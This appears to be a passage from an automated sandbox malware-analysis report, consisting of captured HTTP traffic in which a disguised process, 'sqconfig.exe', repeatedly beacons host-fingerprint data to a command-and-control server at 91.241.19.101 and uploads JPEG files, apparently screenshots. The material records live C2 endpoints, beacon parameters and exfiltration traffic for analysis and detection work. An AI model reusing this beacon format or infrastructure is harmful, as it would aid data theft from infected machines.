                                                                  Data Ascii: 7B'BO&85ET-~v3P5>_ZC$cf{4Xw7Q/aQ{*m1P>!TdTCURiUYZ(P0JQ@RR$Z1J\N@4v(-1Q@\j~f_j[pZh_U_KefqO;pkvxgQLAKIKLi(Ei;L.P)h!(
                                                                  Sep 30, 2021 23:53:32.422866106 CEST16837OUTData Raw: 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 a8 ea da 8a e9 56 4b 74 c8 19 4c f0 c2 72 db 42 89 25 58 f7 67 db 76 7f 0e d4 01 8d 6f e2 3d 56 4d 33 4f d5 25 d2 6c d2 c2 f5 ad c2 94 be 66 95 56 67 45 52 57 ca 03 23 78 c8 dd eb c9 ae 9e bc fa db 5c
                                                                  Data Ascii: ((((VKtLrB%Xgvo=VM3O%lfVgERW#x\MRc:bC"r6st]Q?v8\P^&*BMODVH?,@HWe`s5#5i~)D\h86#WV:[
                                                                  Sep 30, 2021 23:53:32.597372055 CEST16840INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:32 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive
                                                                  Sep 30, 2021 23:53:32.612860918 CEST16840OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:32.778301001 CEST16841INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:32 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  124192.168.2.34995691.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:32.302088022 CEST16790OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:32.493827105 CEST16838INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:32 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  125192.168.2.34995891.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:32.945277929 CEST16842OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86294
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:53:32.945435047 CEST16842OUTData Raw: 2d 2d 2d 2d 2d 2d 30 32 66 36 30 30 62 64 36 30 38 65 64 31 33 65 35 35 31 62 62 36 38 39 63 31 34 66 62 39 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------02f600bd608ed13e551bb689c14fb912Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:53:32.945473909 CEST16851OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:53:32.945514917 CEST16852OUTData Raw: 3b f7 ff 00 33 5f 5e 86 c2 cf 5c bb b7 d2 ee cd d5 8c 72 62 29 8f f1 0f eb ce 46 7b e3 35 cc ea 27 37 4b fe e0 fe 66 af 6f ac eb d3 9b 81 fe e7 f5 35 d5 81 5f bf b9 e5 e7 92 ff 00 62 e5 6e fa a2 bd 14 86 96 bd c3 e2 42 96 92 96 81 1f 57 78 83 56
                                                                  Data Ascii: ;3_^\rb)F{5'7Kfo5_bnBWxVj6(H[Js^~$ngg$)"e&f `FG`yqy~eCVQ_]Yip:Km;"Xb=AZZCVbi-~` >k
                                                                  Sep 30, 2021 23:53:32.945700884 CEST16855OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:53:33.066225052 CEST16861OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:53:33.066293955 CEST16864OUTData Raw: 8e f4 94 53 01 73 4a 0d 36 96 84 c4 3c 35 3d 5b 9a 84 53 85 55 c9 68 9b 20 d0 54 1a 88 1a 50 4d 55 c5 61 c6 15 34 c3 6f e9 52 06 a7 06 a2 c9 8a f2 45 63 0b 0a 69 42 3b 55 de 0d 2e c5 34 b9 10 fd a3 ea 67 91 4a 2a e9 85 4d 30 db 77 14 bd 9b 2b da
                                                                  Data Ascii: SsJ6<5=[SUh TPMUa4oREciB;U.4gJ*M0w+")jC;Rh|b(/4`1K)KE.(N)%q1F)qF)XW1Or2(I1E[hRR1B1Z>bRbF\!!1ZiZ\R!&*R)1SbBVK+)
                                                                  Sep 30, 2021 23:53:33.066313982 CEST16869OUTData Raw: 60 29 db 6a 43 13 0e d4 98 a5 ca c7 cc 33 14 e0 29 71 4b 8a 76 15 c6 e2 94 0a 5c 53 b1 4e c2 b8 dc 51 8a 76 29 71 40 5c 6e 29 71 4e c5 28 15 56 26 e3 71 46 29 f8 a3 14 ec 2b 91 e2 93 6d 4d b6 93 6d 1c a3 e6 21 2b 48 56 a7 2b 4d 2b 53 ca 3e 62 be
                                                                  Data Ascii: `)jC3)qKv\SNQv)q@\n)qN(V&qF)+mMm!+HV+M+S>biJVR2iJWR2J\)L)PhS+M+VS+7E29ZaZHi9_ZaZR"I2S"Ch%%%;bS66:u[xZk[kIFq1L3)<O`V{r
                                                                  Sep 30, 2021 23:53:33.066329956 CEST16872OUTData Raw: e5 0e 64 44 45 2e 2a 4d b4 6d a7 ca c3 98 8f 14 6d 07 b5 49 8a 36 d2 e5 0e 62 23 12 1f e1 a6 1b 74 3e a2 ac 6d a3 14 72 21 a9 b4 55 fb 37 a1 a6 fd 9d c7 4a b9 b4 d2 81 4b d9 a6 35 51 94 3c b6 1d 41 a4 e6 b4 71 4d 2a 0f 51 fa 52 f6 5d 86 aa 94 28
                                                                  Data Ascii: dDE.*MmmI6b#t>mr!U7JK5Q<AqM*QR](WL(}EOc8T"mtI!EN18i9.())bRS\P2@pKbbNbS)jMd)i1iZHJ)Mu2GZJ)::SEJ)
                                                                  Sep 30, 2021 23:53:33.066482067 CEST16874OUTData Raw: 17 c7 1a a2 6b d7 6a 8a 00 55 52 00 00 76 1c 52 ff 00 c2 c6 f1 8f fd 0c 17 bf f7 d0 ff 00 0a e4 85 1a b0 77 8c ac fd 59 d5 3a b4 a6 ad 25 74 7d 29 a6 f8 5b 44 d2 26 f3 ac b4 e8 a3 94 74 76 25 d8 7d 0b 12 47 e1 56 b5 af f9 00 ea 3f f5 eb 2f fe 80
                                                                  Data Ascii: kjURvRwY:%t})[D&tv%}GV?/kX1Sdchefz1DwUh#4Q]((|$u^]+0%g8kxGZkBIoeiR &3_jZey8nTl\O\
                                                                  Sep 30, 2021 23:53:33.066596031 CEST16876OUTData Raw: b3 f0 e4 ab ad 45 65 a8 95 58 e5 b7 b9 95 64 b5 b9 8a 60 5a 28 9d f1 b9 0b 2e 41 51 91 d7 07 b6 45 16 be 2d 7b 0b 3b 31 6f 61 2c d7 96 d7 89 75 14 b7 b7 0b 2a 43 b5 cb 94 89 44 61 a3 56 38 c8 de 41 e4 e3 3c 89 af 3c 5c 97 17 32 de a4 1a dc d7 a2
                                                                  Data Ascii: EeXd`Z(.AQE-{;1oa,u*CDaV8A<<\2:*TIR]-?TnS@/$FhUm@1AL92U9nxG],\CsFI."BwDy:u_Ob(!>\|Am=v57Umwuuk
                                                                  Sep 30, 2021 23:53:33.348506927 CEST16930INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:33 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  126192.168.2.34995991.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:33.014806986 CEST16855OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:33.217149019 CEST16929INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:33 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  127192.168.2.34996091.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:33.455671072 CEST16931OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:33.632704020 CEST16931INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:33 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0
                                                                  Sep 30, 2021 23:53:33.743109941 CEST16931OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86294
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:53:33.743298054 CEST16931OUTData Raw: 2d 2d 2d 2d 2d 2d 30 32 66 36 30 30 62 64 36 30 38 65 64 31 33 65 35 35 31 62 62 36 38 39 63 31 34 66 62 39 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------02f600bd608ed13e551bb689c14fb912Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:53:33.743330002 CEST16941OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:53:33.743406057 CEST16944OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:53:33.871511936 CEST16952OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:53:33.871566057 CEST16963OUTData Raw: 60 29 db 6a 43 13 0e d4 98 a5 ca c7 cc 33 14 e0 29 71 4b 8a 76 15 c6 e2 94 0a 5c 53 b1 4e c2 b8 dc 51 8a 76 29 71 40 5c 6e 29 71 4e c5 28 15 56 26 e3 71 46 29 f8 a3 14 ec 2b 91 e2 93 6d 4d b6 93 6d 1c a3 e6 21 2b 48 56 a7 2b 4d 2b 53 ca 3e 62 be
                                                                  Data Ascii: `)jC3)qKv\SNQv)q@\n)qN(V&qF)+mMm!+HV+M+S>biJVR2iJWR2J\)L)PhS+M+VS+7E29ZaZHi9_ZaZR"I2S"Ch%%%;bS66:u[xZk[kIFq1L3)<O`V{r
                                                                  Sep 30, 2021 23:53:33.871723890 CEST16966OUTData Raw: b3 f0 e4 ab ad 45 65 a8 95 58 e5 b7 b9 95 64 b5 b9 8a 60 5a 28 9d f1 b9 0b 2e 41 51 91 d7 07 b6 45 16 be 2d 7b 0b 3b 31 6f 61 2c d7 96 d7 89 75 14 b7 b7 0b 2a 43 b5 cb 94 89 44 61 a3 56 38 c8 de 41 e4 e3 3c 89 af 3c 5c 97 17 32 de a4 1a dc d7 a2
                                                                  Data Ascii: EeXd`Z(.AQE-{;1oa,u*CDaV8A<<\2:*TIR]-?TnS@/$FhUm@1AL92U9nxG],\CsFI."BwDy:u_Ob(!>\|Am=v57Umwuuk
                                                                  Sep 30, 2021 23:53:33.871772051 CEST16971OUTData Raw: c7 87 18 ff 00 d3 33 5e 2f 7e df be 73 fe d1 af 3b 28 5e f4 cf 7b 39 77 f6 7e 87 a1 59 71 f0 ee 0f a8 fe 75 cc c9 5d 25 a1 c7 c3 bb 6f 73 fd 6b 97 95 c8 27 da b4 c2 2f 7a 7e ac e4 cc dd 94 3d 11 13 92 0f 06 90 4b 20 e8 e4 7e 34 84 e6 9b 5e 8d 91
                                                                  Data Ascii: 3^/~s;(^{9w~Yqu]%osk'/z~=K ~4^;NrgOXoE.Hu,i'AMkI>bq+[2wqVE~5lCT<GsMu5XO-&<Jii-iD'kg/TF5W+9+zO7:&r#
                                                                  Sep 30, 2021 23:53:34.001084089 CEST16977OUTData Raw: 00 15 1c 78 1a d3 de 4a f2 e7 3f 37 e3 5c 78 2f e1 4b d5 9f 47 5f 59 c7 d1 1e cb 37 1e 0f d2 3f dc 1f ca b1 cf 5a d8 b8 ff 00 91 4b 47 ff 00 ae 63 f9 56 3f 7a e4 c3 7c 2f d5 9a 63 3e 35 e8 80 7b d2 e0 51 4b 5d 27 1a 10 0a 7e 29 b4 a2 91 48 70 14
                                                                  Data Ascii: xJ?7\x/KG_Y7?ZKGcV?z|/c>5{QK]'~)Hpp)JK-N)sRhQMIxT2tT!Slhi1J%"Pi:phk~)?"=k~((|dUm#Cm<Bfo1}Xc9iZh7
                                                                  Sep 30, 2021 23:53:34.001123905 CEST16985OUTData Raw: b2 8a d8 b8 60 6a b6 6a f8 e9 80 f0 be 8d fe e9 af 3a 8d bf 7a 9f ef 0a eb fc 75 e2 3d 2b 56 b4 b1 b5 d2 8b 98 ad c1 fb cb 8a e1 d6 52 92 23 76 07 26 b9 30 ed aa 56 6b 5d 4f 6e 70 f7 d7 5d 8f 72 f1 11 db 67 a6 7f d7 01 fc 85 73 e4 e6 96 7f 88 5e
                                                                  Data Ascii: `jj:zu=+VR#v&0Vk]Onp]rgs^Kk*17!-7N.JG8Xb8oxk7Qv7?+i:GwS]zI\3?(?jNP):);CsR3r
                                                                  Sep 30, 2021 23:53:34.001148939 CEST16987OUTData Raw: c4 5a 41 45 2d 6e 72 85 2d 02 8a 04 2d 2d 25 2d 4b 13 16 96 92 8a 04 2d 14 94 b4 80 5a 75 32 9d de 82 47 50 28 a2 90 85 a7 53 45 2d 21 16 20 93 07 15 d1 e8 72 6d ba 8f fd ea e5 94 e1 b3 5b 7a 34 df e9 29 fe f0 ae 3c 54 2f 06 7a 79 75 5b 55 48 d8
                                                                  Data Ascii: ZAE-nr---%-K-Zu2GP(SE-! rm[z4)<T/zyu[UH&,^eeu6~kYeu[3\cu$pV/'bN7P)iq]'%mF)@j <@)TZC18p\/=*[4Q)i*4Q/=)B6h4)Bf
                                                                  Sep 30, 2021 23:53:34.231820107 CEST17019INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:34 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  128192.168.2.34996191.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:33.981385946 CEST16971OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:34.182497978 CEST17018INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:34 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  129192.168.2.34996291.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:34.443310022 CEST17019OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:34.658310890 CEST17033INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:34 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  13192.168.2.34977291.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:52:53.171267033 CEST7428OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:52:53.339108944 CEST7454INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:52:53 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  130192.168.2.34996391.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:34.569993019 CEST17020OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86294
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:53:34.570091963 CEST17020OUTData Raw: 2d 2d 2d 2d 2d 2d 30 32 66 36 30 30 62 64 36 30 38 65 64 31 33 65 35 35 31 62 62 36 38 39 63 31 34 66 62 39 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------02f600bd608ed13e551bb689c14fb912Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:53:34.570317984 CEST17030OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:53:34.570395947 CEST17033OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:53:34.692841053 CEST17041OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
